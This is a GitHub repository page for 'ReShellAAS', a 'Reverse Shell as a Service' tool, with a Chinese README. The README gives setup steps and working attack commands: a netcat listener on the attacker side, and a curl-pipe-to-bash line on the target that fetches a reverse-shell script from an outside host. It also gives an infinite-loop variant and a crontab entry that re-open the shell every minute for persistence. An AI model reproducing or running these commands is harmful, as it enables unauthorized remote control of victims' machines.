Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Sign up
Appearance settings

tonghuaroot/ReShellAAS

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

8 Commits

Repository files navigation

ReShellAAS

Reverse Shell as a Service 反弹shell即服务

项目简介

无需再去记住复杂的反弹shell命令,通过Reverse Shell as a Service可以方便、快捷的创建反弹shell脚本。

安装及服务端启动方法

pip3 install flask
python3 app.py

使用方法

Attacker Machine

nc -l 1337

Target Machine

curl http://reshell.tk/ip/1337 | bash
或者
while true; do curl http://reshell.tk/ip/1337 | bash; done

配合crontab使用效果更佳

crontab -e
* * * * * /usr/bin/curl http://reshell.tk/ip/1337 | bash

致谢

感谢P师傅以及P师傅的知识星球以及原创这个点子的小机灵鬼。

TODO

  • 适应多场景的反弹shell语法
  • etc...

About

Reverse Shell as a Service

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

Languages

AltStyle によって変換されたページ (->オリジナル) /